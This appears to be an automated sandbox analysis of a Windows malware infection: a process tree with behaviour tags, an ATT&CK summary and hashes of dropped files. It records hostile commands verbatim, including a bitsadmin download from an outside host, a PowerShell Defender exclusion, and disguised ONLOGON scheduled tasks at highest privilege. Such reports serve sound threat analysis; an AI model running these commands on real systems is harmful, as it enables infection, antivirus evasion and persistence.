C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de8646f8,0x7ff8de864708,0x7ff8de86471810⤵
-
C:\Users\Admin\AppData\Local\Temp\3a-ea38f-094-9c0bb-4c054e889a288\Caeqaelowaece.exe"C:\Users\Admin\AppData\Local\Temp\3a-ea38f-094-9c0bb-4c054e889a288\Caeqaelowaece.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pg1bgrio.2yz\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\pg1bgrio.2yz\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\pg1bgrio.2yz\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11848 -s 19611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wurbk4pz.top\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\wurbk4pz.top\installer.exeC:\Users\Admin\AppData\Local\Temp\wurbk4pz.top\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\wurbk4pz.top\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\wurbk4pz.top\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632288123 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dcczok1e.yr2\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\dcczok1e.yr2\anyname.exeC:\Users\Admin\AppData\Local\Temp\dcczok1e.yr2\anyname.exe10⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global11⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11836 -s 44812⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\euzuyfvu.24j\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\euzuyfvu.24j\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\euzuyfvu.24j\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7776 -s 26011⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sxropp4a.2co\autosubplayer.exe /S & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\sxropp4a.2co\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\sxropp4a.2co\autosubplayer.exe /S10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqA68.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqA68.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqA68.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqA68.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqA68.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqA68.tmp\tempfile.ps1"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqA68.tmp\tempfile.ps1"11⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z11⤵
- Download via BitsAdmin
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4792 -ip 47921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3796 -ip 37961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4888 -ip 48881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 5960 -ip 59601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 404 -p 5472 -ip 54721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2828 -ip 28281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3224 -ip 32241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6060 -ip 60601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5200 -ip 52001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2568 -ip 25681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5008 -ip 50081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 828 -ip 8281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 11848 -ip 118481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F1A0F5CA4266E93B0D32EB0E1453F6DA C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6534119949796F6D8A9D0DE8AE61E7A32⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 46C64D51C1EAF77FD885B9885B07CD4D E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9360 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 9360 -ip 93601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 7776 -ip 77761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 10836 -ip 108361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 10828 -ip 108281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 10956 -ip 109561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10908 -ip 109081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 10980 -ip 109801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 11888 -ip 118881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2260 -ip 22601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 10964 -ip 109641⤵
-
C:\Users\Admin\AppData\Local\Temp\1195.exeC:\Users\Admin\AppData\Local\Temp\1195.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1195.exeC:\Users\Admin\AppData\Local\Temp\1195.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\1C54.exeC:\Users\Admin\AppData\Local\Temp\1C54.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1C54.exeC:\Users\Admin\AppData\Local\Temp\1C54.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\1C54.exeC:\Users\Admin\AppData\Local\Temp\1C54.exe2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\1C54.exeC:\Users\Admin\AppData\Local\Temp\1C54.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\1C54.exeC:\Users\Admin\AppData\Local\Temp\1C54.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\3924.exeC:\Users\Admin\AppData\Local\Temp\3924.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\51FC.exeC:\Users\Admin\AppData\Local\Temp\51FC.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\5827.exeC:\Users\Admin\AppData\Local\Temp\5827.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8836 -s 8842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 8836 -ip 88361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\BC13.exeC:\Users\Admin\AppData\Local\Temp\BC13.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 2642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 11000 -ip 110001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6284 -ip 62841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9712 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 9712 -ip 97121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 1464 -ip 14641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\12A0.exeC:\Users\Admin\AppData\Local\Temp\12A0.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 8160 -ip 81601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7D61.exeC:\Users\Admin\AppData\Local\Temp\7D61.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7D61.exe"C:\Users\Admin\AppData\Local\Temp\7D61.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 11836 -ip 118361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Install" /sc ONLOGON /tr "'C:\PerfLogs\Install.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\B0C6.exeC:\Users\Admin\AppData\Local\Temp\B0C6.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\B0C6.exe"C:\Users\Admin\AppData\Local\Temp\B0C6.exe"2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\B0C6.exe"2⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\odt\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Suspicious use of NtCreateProcessExOtherParentProcess
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\C3D2.exeC:\Users\Admin\AppData\Local\Temp\C3D2.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9228 -s 3042⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\ProgramData\regid.1991-06.com.microsoft\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\drt\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\DAB7.exeC:\Users\Admin\AppData\Local\Temp\DAB7.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 2642⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\imgutil\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 1496 -ip 14961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 9228 -ip 92281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 11588 -ip 115881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1BITS Jobs
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
568e59b049157be578b13da25b110351
SHA17f134a0efd5cda9c2898de51504ba159819ede59
SHA25698ff038dffbc25ded38d5041a157dc3e8a14b92394358446db4dc3e6d5593ee6
SHA512c020b4d1bef1bf2be6820dc904b61b314f24dc1809a7e97ab1e3d6ba217ee7b282f70def44879effec54425f000403175725f219eb4d165be422ab104902dc90
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
568e59b049157be578b13da25b110351
SHA17f134a0efd5cda9c2898de51504ba159819ede59
SHA25698ff038dffbc25ded38d5041a157dc3e8a14b92394358446db4dc3e6d5593ee6
SHA512c020b4d1bef1bf2be6820dc904b61b314f24dc1809a7e97ab1e3d6ba217ee7b282f70def44879effec54425f000403175725f219eb4d165be422ab104902dc90
-
C:\Users\Admin\AppData\Local\Temp\5.exeMD5
ce31e837ebcd0856a520a76343ec3ec5
SHA1ca3931f935f8b87c2766ed4e2f440694dc63bfbf
SHA2569a64261e29e62cf06652863b49f86b85183ea14302eede53eb075245c70b012b
SHA512fc778da36ad7c17b6bd53f884441f992c6eb56e8502f511c92c533dcc7330bf4a6e6df9d051fa5ed7f913d8dd23a9ee5181ee71843a73c8dcb0a3df4bcf1cc14
-
C:\Users\Admin\AppData\Local\Temp\5.exeMD5
ce31e837ebcd0856a520a76343ec3ec5
SHA1ca3931f935f8b87c2766ed4e2f440694dc63bfbf
SHA2569a64261e29e62cf06652863b49f86b85183ea14302eede53eb075245c70b012b
SHA512fc778da36ad7c17b6bd53f884441f992c6eb56e8502f511c92c533dcc7330bf4a6e6df9d051fa5ed7f913d8dd23a9ee5181ee71843a73c8dcb0a3df4bcf1cc14
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun1905815e51282417.exeMD5
1aecd083bbec326d90698a79f73749d7
SHA11ea884d725caec27aac2b3c0baccfd0c380a414e
SHA256d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31
SHA512c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun1905815e51282417.exeMD5
1aecd083bbec326d90698a79f73749d7
SHA11ea884d725caec27aac2b3c0baccfd0c380a414e
SHA256d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31
SHA512c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun1908b94df837b3158.exeMD5
26c211413dfd432a9ce28c19a67910a1
SHA1dbf2173faa9e35bb9c710e289a247786248fe9e8
SHA256e2a9ab13cd3031c7f5c84180de1f62d5905f87094efd8ab654b5fb7d88860e1b
SHA5124c096e8ed12ebd5ef12b53fb9179fd0c8262837668994a2f2466c61436de95411f05f3af341ac9370448b6e910775b6a3c3a6ddb25850a2b4977c0bc3a3468cd
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun1908b94df837b3158.exeMD5
26c211413dfd432a9ce28c19a67910a1
SHA1dbf2173faa9e35bb9c710e289a247786248fe9e8
SHA256e2a9ab13cd3031c7f5c84180de1f62d5905f87094efd8ab654b5fb7d88860e1b
SHA5124c096e8ed12ebd5ef12b53fb9179fd0c8262837668994a2f2466c61436de95411f05f3af341ac9370448b6e910775b6a3c3a6ddb25850a2b4977c0bc3a3468cd
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun191101c1aaa.exeMD5
ae0bb0ef615f4606fbe1f050b6f08ca3
SHA1f69b6d6496d8941ef53bca7c3578ad616cf5a4b1
SHA25603d079303a3164960677e57a587e86c3a5e7736fbde0ab7b9e60c4b8b2e50745
SHA512ec9ac14ac2ef705867c6c1611671c8185f3d3fe671a787840132a337d4bdf1ad3b808aa3ca24eee58bda78bef19e7a2a9ea5299b224bb370622e5072aa790afd
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun191101c1aaa.exeMD5
ae0bb0ef615f4606fbe1f050b6f08ca3
SHA1f69b6d6496d8941ef53bca7c3578ad616cf5a4b1
SHA25603d079303a3164960677e57a587e86c3a5e7736fbde0ab7b9e60c4b8b2e50745
SHA512ec9ac14ac2ef705867c6c1611671c8185f3d3fe671a787840132a337d4bdf1ad3b808aa3ca24eee58bda78bef19e7a2a9ea5299b224bb370622e5072aa790afd
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun1917b8fb5f09db8.exeMD5
8a40bac445ecb19f7cb8995b5ae9390b
SHA12a8a36c14a0206acf54150331cc178af1af06d9c
SHA2565da618d0d54f9251a1735057b27f9a5188e2ddd44f53ce35ce69caaf678f26a8
SHA51260678907bd654ff44036abcb4491056a1a2279b21e6ac933d2423362dc59ab1232c67cd93ddb80bfe80decc288eb874e333a8b630bf96a0e723bc654c4e35de6
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun1917b8fb5f09db8.exeMD5
8a40bac445ecb19f7cb8995b5ae9390b
SHA12a8a36c14a0206acf54150331cc178af1af06d9c
SHA2565da618d0d54f9251a1735057b27f9a5188e2ddd44f53ce35ce69caaf678f26a8
SHA51260678907bd654ff44036abcb4491056a1a2279b21e6ac933d2423362dc59ab1232c67cd93ddb80bfe80decc288eb874e333a8b630bf96a0e723bc654c4e35de6
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun19262b9e49ad.exeMD5
1ba385ddf10fcc6526f9a443cb27d956
SHA1a8aa18cda5c9cebb1468abd95860ac69102d1295
SHA256ea8cce26f5348e13395c7b4a713b28a7801cfc1a27b67bb860b82063c4276a1d
SHA5121b4f96a9b0e5e203a5a5af88f6f9f71767798bc1ffbfa8d450f93a1cd847045da377730d7208683c0dc1dc5121b46178372d044227af287aca892fc4c82aedc8
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun19262b9e49ad.exeMD5
1ba385ddf10fcc6526f9a443cb27d956
SHA1a8aa18cda5c9cebb1468abd95860ac69102d1295
SHA256ea8cce26f5348e13395c7b4a713b28a7801cfc1a27b67bb860b82063c4276a1d
SHA5121b4f96a9b0e5e203a5a5af88f6f9f71767798bc1ffbfa8d450f93a1cd847045da377730d7208683c0dc1dc5121b46178372d044227af287aca892fc4c82aedc8
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun193fda712d9f1.exeMD5
535ae8dbaa2ab3a37b9aa8b59282a5c0
SHA1cb375c45e0f725a8ee85f8cb37826b93d0a3ef94
SHA256d838cfaf7b197d6c3379e2c5daf269cc422a09df556de6ca08fe174b4906b3b6
SHA5126be6a3d8fa5d1fb17f85bdacf873280a3a074739fb68037de1a50c63d2d24e5b6b3ffabb838c3097ff9840ed27391a3fb812c802010ca3db860414c34123867c
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun193fda712d9f1.exeMD5
535ae8dbaa2ab3a37b9aa8b59282a5c0
SHA1cb375c45e0f725a8ee85f8cb37826b93d0a3ef94
SHA256d838cfaf7b197d6c3379e2c5daf269cc422a09df556de6ca08fe174b4906b3b6
SHA5126be6a3d8fa5d1fb17f85bdacf873280a3a074739fb68037de1a50c63d2d24e5b6b3ffabb838c3097ff9840ed27391a3fb812c802010ca3db860414c34123867c
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun195a1614ec24e6a.exeMD5
9b7319450f0633337955342ae97fa060
SHA14cc5b5dfc5a4cf357158aedcab93ce4cc5bff350
SHA256c3926ccef4c9bce26bd1217ea25e108d92707847e04ddb4e1eadfff1a913d085
SHA512e75d5e032374ead6836e37ad8a4e2d59da7e641aea178551ee187980455067d90c076ac8e49330b55e1f13591a14305401f3e59520b63ed628a83213220b7ffb
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun195a1614ec24e6a.exeMD5
9b7319450f0633337955342ae97fa060
SHA14cc5b5dfc5a4cf357158aedcab93ce4cc5bff350
SHA256c3926ccef4c9bce26bd1217ea25e108d92707847e04ddb4e1eadfff1a913d085
SHA512e75d5e032374ead6836e37ad8a4e2d59da7e641aea178551ee187980455067d90c076ac8e49330b55e1f13591a14305401f3e59520b63ed628a83213220b7ffb
-
